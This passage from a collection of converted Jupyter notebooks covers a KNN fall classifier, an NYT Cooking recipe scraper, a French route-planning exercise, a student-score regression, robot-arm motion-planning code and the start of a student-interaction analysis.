(row1[i] - row2[i])**2\n return sqrt(distance)\n\n\n# + [markdown] id=\"a7na92_Yf77j\"\n# ## Locating the most similar neighbors\n\n# + id=\"UH_OgsHyfzI3\"\n# Locate the most similar neighbors\n# Result\n# [6, 5, 7, 5, 6, 7, 1]\n# [7, 6, 7, 6, 5, 6, 1]\n# [5, 6, 6, 6, 5, 7, 1]\n\ndef get_neighbors(train, test_row, num_neighbors):\n distances = list()\n for train_row in train:\n dist = euclidean_distance(test_row, train_row)\n distances.append((train_row, dist))\n distances.sort(key=lambda tup: tup[1])\n neighbors = list()\n for i in range(num_neighbors):\n neighbors.append(distances[i][0])\n return neighbors\n\n\n# + [markdown] id=\"Vii7P5yegEzg\"\n# ## Making Classification prediction with neighbors\n\n# + id=\"3Fpn3kSnfzLZ\"\n# Make a classification prediction with neighbors\n# test_row is [7, 6, 5, 5, 6, 7]\n# num_neighbors is 3\ndef predict_classification(train, test_row, num_neighbors):\n neighbors = get_neighbors(train, test_row, num_neighbors)\n output_values = [row[-1] for row in neighbors]\n prediction = max(set(output_values), key=output_values.count)\n return prediction\n\n\n# + [markdown] id=\"sb-aEhyTgNzN\"\n# ## Dataset - Train and test data\n\n# + id=\"2EY22g9fgO0f\"\n# Test distance function\n# Here, 0 means Not Fall(-), 1 means Fall(+)\ndataset = [[1,2,3,2,1,3,0],\n [2,1,3,3,1,2,0],\n [1,1,2,3,2,2,0],\n [2,2,3,3,2,1,0],\n [6,5,7,5,6,7,1],\n [5,6,6,6,5,7,1],\n [5,6,7,5,7,6,1],\n [7,6,7,6,5,6,1]]\n\n# + [markdown] id=\"8spMRh7PgU-g\"\n# ## Predicting for new dataset\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"Mzlh4rYFgXuX\" outputId=\"182c189d-1496-44fb-891f-c14861d96f65\"\nprediction = predict_classification(dataset, [7,6,5,5,6,7], 3)\n# Display\n# Expected 1, Got 1.\nprint('Expected %d, Got %d.' % ([7,6,5,5,6,7,1][-1], prediction))\n","repo_name":"HarshineeRoopakula/Machine-Learning-Projects","sub_path":"KNN/Falling Prediction using kNN/KNN_from_scratch.ipynb","file_name":"KNN_from_scratch.ipynb","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"24032751251","text":"# +\nfrom bs4 import BeautifulSoup \nimport requests\nimport pandas as pd\nimport numpy as np\npd.set_option('display.max_colwidth', None)\nimport time\n\nfrom tqdm.notebook import tqdm\nimport extruct\nimport pickle\n# -\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15\"\n}\n\n# +\nsitemap_url = 'https://www.nytimes.com/sitemaps/new/cooking.xml.gz'\nresponse = requests.get(sitemap_url, headers=headers)\nsitemap_xml = response.text\nsitemap_soup = BeautifulSoup(sitemap_xml, features='xml')\n\ngz_urls = []\nloc_tags = sitemap_soup.find_all('loc')\n\nfor loc in loc_tags:\n gz_urls.append(loc.get_text()) \n\ndisplay(gz_urls)\nprint(len(gz_urls))\n# -\n\nwith open('../data/nytc_raw_urls.pkl', 'rb') as f:\n recipe_urls = pickle.load(f)\n\n# +\n# recipe_urls = []\n\n# for url in tqdm(gz_urls):\n# response = requests.get(url, headers=headers)\n# sitemap_soup = BeautifulSoup(response.text, features='xml')\n# loc_tags = sitemap_soup.find_all('loc')\n# for loc in loc_tags:\n# recipe_urls.append(loc.get_text()) \n\n# -\n\ndisplay(recipe_urls)\nlen(recipe_urls)\n\n# +\n# with open('../data/nytc_raw_urls.pkl', 'wb') as f:\n# pickle.dump(recipe_urls, f)\n# -\n\n# Quick and dirty prune?\n\n# +\nimport random\n\nrandom_url = random.choice(recipe_urls)\nprint(random_url)\n\n# +\nimport 
extruct\n\npage = requests.get(random_url, headers=headers)\nrecipe_soup = BeautifulSoup(page.text, 'html.parser')\n\nrecipe_data = extruct.extract(\n page.text,\n syntaxes=['json-ld'],\n uniform=True,\n )['json-ld'][0]\ndisplay(recipe_data)\n\n# +\nheadline = recipe_data['name'] # or 'name'\nnutrition = recipe_data['nutrition']\ncategory = recipe_data['recipeCategory']\ncuisine = recipe_data['recipeCuisine']\ningredient = recipe_data['recipeIngredient']\ninstruction = recipe_data['recipeInstructions'][0]['text']\n\nprint(headline)\nprint(nutrition)\nprint(category)\nprint(cuisine)\nprint(ingredient)\nprint(instruction)\n# -\n\n# Test out a few recipes first\n\n# +\nfrom nytc import NYTC\n\nrecipes = pd.Series(recipe_urls, name='url')\nfeatures = ['recipe_name', 'nutrition', 'category', 'cuisine', 'ingredient', 'instruction', 'raw_schema']\n# -\n\nfeature_df = pd.DataFrame(columns=features)\nfor i in tqdm(range(10)):\n url = recipes.iloc[i]\n try:\n recipe = NYTC(url)\n feature_df.loc[i] = [getattr(recipe, feature)() for feature in features]\n time.sleep(np.random.uniform(0.05, 1))\n except:\n feature_df.loc[i] = [np.nan] * len(features)\n\n\nfeature_df.head(3)\n\nfeature_df = pd.DataFrame(columns=features)\nfor i in tqdm(range(len(recipe_urls))):\n url = recipes.iloc[i]\n try:\n recipe = NYTC(url)\n feature_df.loc[i] = [getattr(recipe, feature)() for feature in features]\n time.sleep(np.random.uniform(0.05, 1))\n except:\n feature_df.loc[i] = [np.nan] * len(features)\n\ndata_df = pd.concat([recipes, feature_df], axis=1)\n\ndata_df.to_pickle('../data/nytc_data.pkl')\n\n# Sanity Check\n\ndata_df.sample(10)\n\n\n# Append cooking time and image url to filtered dataframe\n\nwith open('../data/nytc_data_filtered.pkl', 'rb') as f:\n recipe_data = pickle.load(f)\n\nrecipe_data.shape\n\ndisplay(recipe_data.head(3))\n\nfiltered_url = recipe_data['url'].to_list()\nfiltered_url\n\n# +\nimport random\n\nrandom_url = random.choice(filtered_url)\nprint(random_url)\n\npage = requests.get(random_url, headers=headers)\nrecipe_soup = BeautifulSoup(page.text, 'html.parser')\n\nrecipe_data = extruct.extract(\n page.text,\n syntaxes=['json-ld'],\n uniform=True,\n )['json-ld'][0]\ndisplay(recipe_data)\n","repo_name":"clintonlau/TOMT","sub_path":"scrape/nytc_scrape.ipynb","file_name":"nytc_scrape.ipynb","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"40393454831","text":"# # Calcul d'itinéraires\n\n#
\n#\n# ## Un programme:\n#\n# **En Python la bibliothèque pyroutelib3 permet de déterminer des itinéraires à partir de coordonnées 'GPS'**\n\n# +\nfrom pyroutelib3 import Router\nfrom geopy.geocoders import ArcGIS\n\ngeolocator = ArcGIS()\n\nlocation1 = geolocator.geocode(\"Vire\")\nlocation2 = geolocator.geocode(\"Kairon Plage\")\n\nlat1=location1.latitude\nlon1=location1.longitude\n\nlat2=location2.latitude\nlon2=location2.longitude\n\nprint(lat1,lon1)\nprint(lat2,lon2)\n\n# création de l'itinéraire\nrouter = Router(\"car\")\ndepart = router.findNode(lat1,lon1)\nprint(depart)\narrivee = router.findNode(lat2, lon2)\nprint(arrivee)\n\nstatus, route = router.doRoute(depart,arrivee)\nif status == 'success':\n routeLatLons = list(map(router.nodeLatLon, route))\n\n# on fait afficher le début de la liste obtenue, et sa longueur\nprint(routeLatLons[:10])\nprint(len(routeLatLons))\n# -\n\n#
\n#\n# ### Faisons afficher cet itinéraire sur une carte\n#\n# Comme il y a 906 marqueurs, on utilisera une boucle qui ne fera afficher qu'un marqueur sur 10\n\n# +\nimport folium\n\nc= folium.Map(location=[lat1, lon1],zoom_start=9)\nfor indice,coord in enumerate(routeLatLons):\n if indice%10==0:\n coord=list(coord)\n folium.Marker(coord).add_to(c)\n \n# voici une méthode pour sauvegarder la carte obtenue\nc.save('playa.html')\n# affichage de la carte\ndisplay(c)\n\n# -\n\n#
\n#\n# ### Un itinéraire en vélo...\n#\n# Observer le code et repérez la ligne où on peut modifier le moyen de transport par : cycle, foot, horse, tram ou train\n#\n# ## À faire :\n#\n# **Écrire un programme qui affiche un itinéraire entre deux localité de votre choix en vélo, à pied ou à cheval..**\n#\n\n# +\n# Écrire le code ici\n# -\n\n#
\n#\n# ## Calculer la distance entre deux lieux\n#\n# Si on additionne des distances géodésiques (Voir TP 2) de lieux proches, on approxime assez bien la distance réelle\n#\n# Dans le code précédent routeLatLons est une liste de coordonnées de points proches les uns des autres\n#\n# **Voici un code qui permet d'additionner les distances géodésiques de ces lieux en miles**\n\n# +\nfrom geopy.distance import geodesic\n\n# calcul de la distance\nd=0\nfor i in range(0,len(routeLatLons)-1,1):\n d=d+geodesic(routeLatLons[i],routeLatLons[i+1]).km\nprint(d, \" km\")\n# -\n\n#
\n#\n# ## À faire :\n#\n# **Faites calculer la distance en km entre deux lieux de votre choix pour une ballade à pied ...**\n\n# +\n# Écrire le code ici\n# -\n\n#\n#
\n#\n#\n# ### Pour enregistrer:\n#\n# 1. File\n# 2. Download as \n# 3. Notebook (.ipynb)\n#\n# ### Autre méthode \n#\n# Cliquer dans la barre d'outils sur Download puis enregistrer le fichier.\n#\n#

Notebook à rendre sur pronote

\n#\n#\n\n\n","repo_name":"LyceeCurieVire/SNT","sub_path":"Charpentier/Itineraire.ipynb","file_name":"Itineraire.ipynb","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"7599621792","text":"# + [markdown] id=\"view-in-github\" colab_type=\"text\"\n# \"Open\n\n# + [markdown] id=\"vjmmTHWylovv\"\n# # **Graduate Rotational Internship Program**\n# # ** The Spark Foundation **\n\n# + [markdown] id=\"PjLlXysNm18R\"\n# # **Author: Ranjith Macharla**\n\n# + [markdown] id=\"TIl0xoHaBC_4\"\n# # **TASK1 :- Prediction Using Supervised Machine Learning**\n#\n\n# + [markdown] id=\"j3PKzeJSnFBG\"\n# # **Objective: To predict the score, that student will secure if a student studies for 9.25hrs/day**\n\n# + [markdown] id=\"5_1THnIUG-Bi\"\n# # **Dataset Loading and understanding the data**\n\n# + id=\"4fk8hPBeCVHr\"\nimport pandas as pd\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 204} id=\"pu3sKaevCxjA\" outputId=\"48fa1647-d58d-485b-a40c-f21b68e56541\"\ndataset=pd.read_csv(\"/content/student_scores - student_scores.csv\")\ndataset.head(5)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"XfpkPfanFg50\" outputId=\"fff482c0-5542-4710-924f-2c95248fe0a1\"\n\ndataset.shape\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"D7IYtxR-GdEj\" outputId=\"6235914e-2db6-44d2-8493-fc6a9a50d25b\"\ndataset.describe\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"YPn1LFb0Gr8w\" outputId=\"37f6a503-b1f7-4046-8ef3-996ee6cd341a\"\ndataset.info()\n\n# + [markdown] id=\"6_h0_BLZHpfH\"\n# # **Data Visualization**\n\n# + id=\"V4XNxcu_G6yK\"\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n# %matplotlib inline \n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 317} id=\"V9t4OxrtIjlg\" outputId=\"eefb0243-155b-4e5e-8059-ef9b2c034d95\"\nsns.scatterplot(x='Hours',y='Scores',data=dataset,color='blue')\nplt.title('Number of hours students study Vs Marks obtained ',fontsize=20,color='red')\nplt.xlabel('Number of hours students study',fontsize=10)\nplt.ylabel('Marks obtained',fontsize=10)\nplt.legend(['Marks'])\nplt.show\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 326} id=\"okL63-VALdyC\" outputId=\"e58533a0-d613-499d-9620-0743356cbc7c\"\nplt.bar(dataset[\"Hours\"].values, dataset[\"Scores\"].values, color='green')\nplt.title('number of hours student study Vs marks secured',fontsize=25)\nplt.xlabel('number of hours student study', fontsize=15)\nplt.ylabel('marks secured',fontsize=15)\nplt.show\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"iRBsN8goYul4\" outputId=\"42617dc3-816b-4b0a-fde1-7986862c0b64\"\nx=dataset.iloc[:,:-1].values\ny=dataset.iloc[:,1:].values\nprint(\"Hours\",x)\nprint(\"Scores\",y)\n\n# + [markdown] id=\"pjX6CYospQe0\"\n# # **Splitting dataset into training and testing dataset**\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"XFim2PC5Y2u7\" outputId=\"f87c7fc2-4b6e-4d05-d362-1653bb71478e\"\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=0)\nprint(x_train.shape)\nprint(y_train.shape)\nprint(x_test.shape)\nprint(y_test.shape)\n\n\n\n# + [markdown] id=\"otDasNHrplDG\"\n# # **Training the model using LinearRegression Algorithm**\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 204} id=\"IgQiYhYPbebK\" outputId=\"fc1d625b-4ddd-4269-ac9c-d1dc2978afde\"\nfrom 
sklearn.linear_model import LinearRegression \nlr=LinearRegression()\nlr.fit(x_train,y_train) \ny_pred=lr.predict(x_test)\n#print(y_pred)\n#print(y_test)\ny_test=list(y_test)\ny_pred=list(y_pred)\ndf = pd.DataFrame({'Actual':y_test,'Prediction':y_pred},index=[1,2,3,4,5])\ndf\n\n\n# + [markdown] id=\"DXCAMMvbp4Br\"\n#\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 312} id=\"pHNv_mv17Tf5\" outputId=\"2aaa279c-651c-43c4-d321-c7975324b883\"\nplt.scatter(x_train,y_train,color='green')\nplt.plot(x_train,lr.predict(x_train),color='red')\nplt.title(\"TrainingCase Vs Predictions\")\nplt.xlabel(\"student study hours\")\nplt.ylabel(\"marks secured\")\nplt.show\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 312} id=\"SbbKo36l4lZ7\" outputId=\"f22dd149-10e4-4132-c0f3-7d4d5b3d061a\"\nplt.scatter(x_test,y_test,color='green')\nplt.plot(x_test,y_pred,color='red')\nplt.title(\"TestCase Vs Predictions\")\nplt.xlabel(\"students study hours\")\nplt.ylabel(\"marks secured\")\nplt.show\n\n# + [markdown] id=\"fn-f-GOIqDPG\"\n# # **Model Evaluation**\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"EvMradPD8Bwm\" outputId=\"7c8ff6cd-3b58-474e-ec18-68d9bc0a0b28\"\nfrom sklearn import metrics\nfrom sklearn.metrics import accuracy_score\nm_a_e=metrics.mean_absolute_error(y_test,y_pred)\nprint(\"mean_absolute_error:{}\".format(m_a_e))\n\n\n# + [markdown] id=\"xAtaMTY6qJMc\"\n# # **Predicting the marks secured, if a student studies for 9.25 hrs/day**\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"NVCQtMMuBIrX\" outputId=\"71e25fd9-23a0-4415-fada-93e9b59a28a5\"\nHours=[[9.25]]\nprint(lr.predict(Hours))\n","repo_name":"ranjith-cpu/datascienceinternship-GRIP","sub_path":"linearregression.ipynb","file_name":"linearregression.ipynb","file_ext":"py","file_size_in_byte":4857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"20793173492","text":"# +\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport itertools\nimport time\nfrom functools import lru_cache\nimport heapq\nfrom matplotlib.widgets import Slider\nfrom ipywidgets import interact\n# %matplotlib inline\n\nPI = np.pi\nTWO_PI = 2 * np.pi\n\n# +\nnum_joints = 3\ndeltas = np.array([1/10] * num_joints)\n\nsolo_positive_moves = [[0] * (num_joints - i) + [1] * i for i in range(1, num_joints + 1)]\nsolo_negative_moves = [[0] * (num_joints - i) + [-1] * i for i in range(1, num_joints + 1)]\nmoves = np.array(solo_positive_moves + solo_negative_moves)\nmove_costs = np.stack([deltas, deltas], axis = 0).flatten()\nmoves, move_costs\n\n# +\n# num_joints= 3\n# deltas = np.arange(num_joints)\n# np.cumsum(deltas * np.concatenate([np.eye(num_joints), -np.eye(num_joints)], 0), 1)\n\n# +\nnum_joints = 4\nlengths = np.array([7, 6, 5, 3])\n\n\n# angles = np.array([0.5, 0.5, 0.5, 0.5]) * PI_CONSTANT\nangles = np.array([2 / 3, 1 / 3, -1/3, 0]) * PI\n# angles = np.array([2.93215314, 3.29867229, 1.46607657, 3.19395253])\n# angles = (PI_CONSTANT - np.array([1.98967535, 2.77507351, 3.56047167, -PI_CONSTANT])) % DOUBLE_PI_CONSTANT\n\ndelta_numbers = np.array([120] * num_joints)\nangles_constraints = [(1 - 10 / 180) * np.pi] * 4\n# -\n\nsup = Manipulator_2d_supervisor(num_joints, lengths, delta_numbers, angles_constraints)\ntest_random_state = sup.generate_random_state()\ntest_mann = Manipulator_2d(num_joints, lengths, np.array([2.04203522, 1.04719754, 0.05235989, 0.41887902]), 
delta_numbers)\ntest_mann.visualize()\nprint(sup.calculate_distance_between_states(test_random_state, np.array([0.5, 0.5, 0.5, 0.5]) * PI_CONSTANT))\n\n# +\npoints = np.array([[1, 2, 3],\n[1, 2 + 0.2, 3]])\n# print(points.shape)\ndef some_strange_function(A,B,C):\n left = (C[1] - A[1]) * (B[0] - A[0])\n right = (B[1] - A[1]) * (C[0] - A[0])\n len_cb = np.linalg.norm(C - B) ** 2\n if right == 0 or abs(left - right)/ right < 0.2: return 0\n if left > right: return 1\n return -1\n\nt1 = plt.Polygon(points.T, color='red')\nplt.gca().add_patch(t1)\nplt.scatter(points[0, :], points[1, :])\nplt.show()\nprint(some_strange_function(points[:, 0], points[:, 1], points[:, 2]))\n\n\n# +\ndef adjacent_joints_angles(angles):\n '''\n Returns True if angles are correct, else False\n '''\n if abs((PI + angles[0]) % TWO_PI) < angles_constraints[1]:\n return False\n for angle_index in range(num_joints - 1):\n if abs((PI + angles[angle_index] - angles[angle_index + 1]) % TWO_PI) < angles_constraints[angle_index + 1]:\n return False\n return True\n\ndef my_adj(angles):\n values = np.diff(angles, prepend=0)\n return not (np.abs((PI - values) % TWO_PI) < angles_constraints).any()\n\ndef calculate_dots(angles):\n dots = np.zeros((num_joints + 1, 2))\n dots[1:, 1] = np.cumsum(np.sin(angles))\n dots[1:, 0] = np.cumsum(np.cos(angles))\n return dots\n\nnum_joints= 4\nangles = np.array([1/4, -1/3, 1/6, 1/6]) * np.pi\nangles_constraints = np.array([(1 - 1/3) * np.pi] * 4)\ndots = calculate_dots(angles)\nplt.plot(dots[:,0], dots[:, 1])\nplt.show()\nprint(adjacent_joints_angles(angles), my_adj(angles))\n\n\n# -\n\nclass Manipulator_2d_supervisor():\n def __init__(self, \n num_joints: int, \n lengths: np.ndarray, \n angle_discretization: int, \n angles_constraints: np.ndarray,\n ground_level: int = 0,\n distanse_between_edges: int = 0.2):\n '''\n initializing Manipulator supervisor\n \n num_joint: number of manipulator joints\n length: np.ndarray of manipulator's arms length\n angle_discretization: int value of how many bins of angles we will have. Number of bins is TWO_PI / angle_discretization\n angles_constraints: np.ndarray with shape num_joints with left and right_bounds. 
\\\n Absolute value of differrence between to near angles couln't be more than PI(1 - angles_constraints)\n ground_level: float minimum level of joints positions.\n distanse_between_edges: float minimum distance between edges\n '''\n self.num_joints = num_joints\n self.lengths = lengths\n self.radius = sum(self.lengths)\n self.angle_discretization = angle_discretization\n self.deltas = TWO_PI / angle_discretization\n self.angles_constraints = angles_constraints\n self.possible_moves = np.cumsum(self.deltas * np.concatenate([np.eye(num_joints), -np.eye(num_joints)], 0), 1)\n self.ground_level = ground_level\n self.distanse_between_edges = distanse_between_edges\n \n @lru_cache(maxsize=10**4) \n def calculate_dots(self, angles):\n '''\n By angles of joints calculates coordinates of each joint.\n \n angles: angles of joints\n return: dots - np.ndarray(num_joints, 2) with coordinates x,y of each joint\n '''\n dots = np.zeros((self.num_joints + 1, 2))\n sin = np.sin(angles) * self.lengths\n cos = np.cos(angles) * self.lengths\n dots[1:, 1] = np.cumsum(sin)\n dots[1:, 0] = np.cumsum(cos)\n return dots\n \n @lru_cache(maxsize=10**4) \n def calculate_end(self, angles):\n '''\n By angles of joints calculates coordinates of last point of manipulator.\n \n angles: angles of joints\n return: (x, y) coordinates x,y of last point\n '''\n x = np.sum(np.sin(angles) * self.lengths)\n y = np.sum(np.cos(angles) * self.lengths)\n return (x, y)\n \n def calculate_distance_between_states(self, angles_1, angles_2):\n '''\n Calculates distanst between states like a difference between angles\n distanse = sum(\n min(\n abs(angles_1[i] - angles_1[i]),\n TWO_PI - abs(angles_1[i] - angles_1[i])\n )\n )\n '''\n diffs = (np.abs(angles_1 - angles_2)) % TWO_PI\n angle_diffs = np.minimum(diffs, (TWO_PI - diffs))\n return angle_diffs.sum()\n \n def generate_random_state(self):\n random_delta_numbers = np.random.randint(0, self.angle_discretization, self.num_joints)\n random_state = random_delta_numbers * self.deltas\n while not self.position_correctness(random_state):\n random_delta_numbers = np.random.randint(0, self.angle_discretization, self.num_joints)\n random_state = random_delta_numbers * self.deltas\n return random_state\n\n def orientation(self, A, B, C):\n '''\n A, B, C: points of triangle\n return orientation of triangle ABC as +1, -1\n if A is to close to BC segment return 0\n '''\n left = (C[1] - A[1]) * (B[0] - A[0])\n right = (B[1] - A[1]) * (C[0] - A[0])\n if right == 0 or abs(left - right) / right < self.distanse_between_edges:\n return 0\n if left > right: return 1\n return -1\n \n def do_intersect(self, segment1, segment2): \n '''\n Check intersection of two segments\n \n segment1: coordinates of start and finish poits of segment1\n segment2: coordinates of start and finish poits of segment2\n \n return True if has intersect and False otherwise\n '''\n A, B = segment1\n C, D = segment2\n o1 = orientation(A, C, D)\n o2 = orientation(B, C, D)\n o3 = orientation(A, B, C)\n o4 = orientation(A, B, D)\n return o1 * o2 * o3 * o4 == 0 or (o1 != o2 and o3 != o4) \n\n def position_intersection(self, dots):\n '''\n Returns True if NO self-intersection, else False\n '''\n for segment_1_index in range(self.num_joints - 1):\n for segment_2_index in range(segment_1_index + 2, self.num_joints):\n segment_1_dots = dots[segment_1_index: segment_1_index + 2] \n segment_2_dots = dots[segment_2_index: segment_2_index + 2]\n if self.do_intersect(segment_1_dots, segment_2_dots):\n return False\n return True\n\n def 
adjacent_joints_angles(self, angles):\n '''\n Returns True if angles are correct, else False\n '''\n diffs = np.diff(angles, prepend=0)\n return not (np.abs((PI - diffs) % TWO_PI) < self.angles_constraints).any()\n\n def position_correctness(self, angles):\n '''\n Checking if possition is correct \n input: angles of joints\n return: True if position is correct and False otherwise\n '''\n if not self.adjacent_joints_angles(angles):\n return False\n dots = self.calculate_dots(angles)\n return self.position_intersection(dots) and \\\n (dots[1:, 1] > self.ground_level).all()\n\n def get_successors(self, angles):\n '''\n Returns massive, which elements are [, ]\n '''\n possible_neighbours = (self.possible_moves + angles) % TWO_PI\n successors = []\n for successor_state in possible_neighbours:\n if self.position_correctness(successor_state):\n successors.append([successor_state, self.calculate_end(successor_state)])\n return successors\n\n def are_states_directly_connected(self, begin_state, end_state):\n connect_path = []\n current_state = begin_state\n while not self.calculate_distance_between_states(current_state, end_state) < 0.01:\n print(f' current = {current_state}')\n best_neighbour = None\n for successor_state, move_cost, x, y in self.get_successors(current_state):\n diffs = (np.abs(successor_state - end_state)) % TWO_PI\n angle_diffs = np.minimum(diffs, (TWO_PI - diffs))\n\n print(f'successor = {successor_state}, dist = {self.calculate_distance_between_states(successor_state, end_state)}, diff = {angle_diffs}')\n if self.calculate_distance_between_states(successor_state, end_state) < self.calculate_distance_between_states(current_state, end_state):\n neighbour = Manipulator_2d_node(successor_state, parent=current_state) \n best_neighbour = neighbour\n connect_path.append(best_neighbour)\n current_state = successor_state \n diffs = (np.abs(successor_state - end_state)) % TWO_PI\n angle_diffs = np.minimum(diffs, (2 * TWO_PI - diffs))\n print(f'chosen = {best_neighbour.get_angles()}, dist = {self.calculate_distance_between_states(best_neighbour.get_angles(), end_state)}, diff = {angle_diffs}')\n if best_neighbour is None:\n return False, None\n return True, connect_path\n \n def visualize_state(self, angles):\n dots = self.calculate_dots(angles)\n plt.figure(figsize=(10,6))\n plt.axis([-self.radius, self.radius, 0, self.radius])\n plt.plot(dots[:, 0], dots[:, 1])\n plt.scatter(dots[:, 0], dots[:, 1])\n\n\n","repo_name":"euskov17/Manipulators_Diploma","sub_path":"Manipulator2DMap/.ipynb_checkpoints/Manipulator_2D-checkpoint.ipynb","file_name":"Manipulator_2D-checkpoint.ipynb","file_ext":"py","file_size_in_byte":10999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"3"} +{"seq_id":"18873597609","text":"# + [markdown] id=\"nLQn0xwfWozn\"\n# # Predicting and analyzing student interraction and student success rate using Machine Learning algorithm.\n# -Anish Ghosh and Debopriyo Mukhopadhyay\n\n# + [markdown] id=\"XdlUGYKDXVEG\"\n# ##1.Predicting Student Interraction.\n\n# + [markdown] id=\"H9XuVsamYlEm\"\n# Required Header Files\n\n# + id=\"rfKpp0hoWlD6\"\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn.preprocessing import StandardScaler\nimport matplotlib.pyplot as plt # plotting\nimport numpy as np # linear algebra\nimport os # accessing directory structure\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 73} id=\"F33DxA7BY40-\" outputId=\"faa641cd-6aeb-44ae-f792-fbe49ca74354\"\nfrom google.colab import files\n\n\nuploaded = files.upload()\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 488} id=\"osdrEURBZQF1\" outputId=\"42e358b3-7692-4538-cbe2-b07c68a4946f\"\ndf = pd.read_csv('online_classroom_data.csv', index_col=0)\ndf\n\n\n# + id=\"VxhxY9trdOjM\"\ndef plotPerColumnDistribution(df, nGraphShown, nGraphPerRow):\n nunique = df.nunique()\n df = df[[col for col in df if nunique[col] > 1 and nunique[col] < 50]] # For displaying purposes, pick columns that have between 1 and 50 unique values\n nRow, nCol = df.shape\n columnNames = list(df)\n nGraphRow = (nCol + nGraphPerRow - 1) / nGraphPerRow\n plt.figure(num = None, figsize = (6 * nGraphPerRow, 8 * nGraphRow), dpi = 80, facecolor = 'w', edgecolor = 'k')\n for i in range(min(nCol, nGraphShown)):\n plt.subplot(nGraphRow, nGraphPerRow, i + 1)\n columnDf = df.iloc[:, i]\n if (not np.issubdtype(type(columnDf.iloc[0]), np.number)):\n valueCounts = columnDf.value_counts()\n valueCounts.plot.bar()\n else:\n columnDf.hist()\n plt.ylabel('counts')\n plt.xticks(rotation = 90)\n plt.title(f'{columnNames[i]} (column {i})')\n plt.tight_layout(pad = 1.0, w_pad = 1.0, h_pad = 1.0)\n plt.show()\n\n\n# + id=\"qn08gMh6dw5z\"\n# Correlation matrix\ndef plotCorrelationMatrix(df, graphWidth):\n filename = df.dataframeName\n df = df.dropna('columns') # drop columns with NaN\n df = df[[col for col in df if df[col].nunique() > 1]] # keep columns where there are more than 1 unique values\n if df.shape[1] < 2:\n print(f'No correlation plots shown: The number of non-NaN or constant columns ({df.shape[1]}) is less than 2')\n return\n corr = df.corr()\n plt.figure(num=None, figsize=(graphWidth, graphWidth), dpi=80, facecolor='w', edgecolor='k')\n corrMat = plt.matshow(corr, fignum = 1)\n plt.xticks(range(len(corr.columns)), corr.columns, rotation=90)\n plt.yticks(range(len(corr.columns)), corr.columns)\n plt.gca().xaxis.tick_bottom()\n plt.colorbar(corrMat)\n plt.title(f'Correlation Matrix for {filename}', fontsize=15)\n plt.show()\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"l6NIC3A-ZeaN\" outputId=\"84cebcae-9d71-4b12-e252-1ea486a12066\"\nnRowsRead = 1000 # specify 'None' if want to read whole file\ndf1 = pd.read_csv('online_classroom_data.csv', delimiter=',', nrows = nRowsRead)\ndf1.dataframeName = 'online_classroom_data.csv'\nnRow, nCol = df1.shape\nprint(f'There are {nRow} rows and {nCol} columns')\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 288} id=\"RqVXcxDSiUdY\" outputId=\"806e176b-2445-4cbd-b847-df9792c30b05\"\ndf1.head(5)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 621} id=\"awdI6unsignA\" outputId=\"d71dbce6-7878-42b7-e1dd-df80c13096df\"\nplotPerColumnDistribution(df1, 10, 5)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 647} id=\"tT2-TjKHirc4\" outputId=\"7a7b31a1-20cb-4b79-9f1e-064f91146c39\"\nplotCorrelationMatrix(df1, 8)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 961} id=\"FeEq8dmDi9WQ\" outputId=\"b486dc4f-8ba7-45fc-ead8-10377d294757\"\nimport seaborn as sns \nsns.pairplot(df1)\n\n# + [markdown] id=\"y6kR1LXJa0L0\"\n# ##2.Analyzing Success Rate of student.\n#\n\n# + [markdown] id=\"qD3xvXWRj6Bf\"\n# Require Header Files.\n\n# + id=\"szW5veGsZxEd\"\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\nimport matplotlib.pyplot 
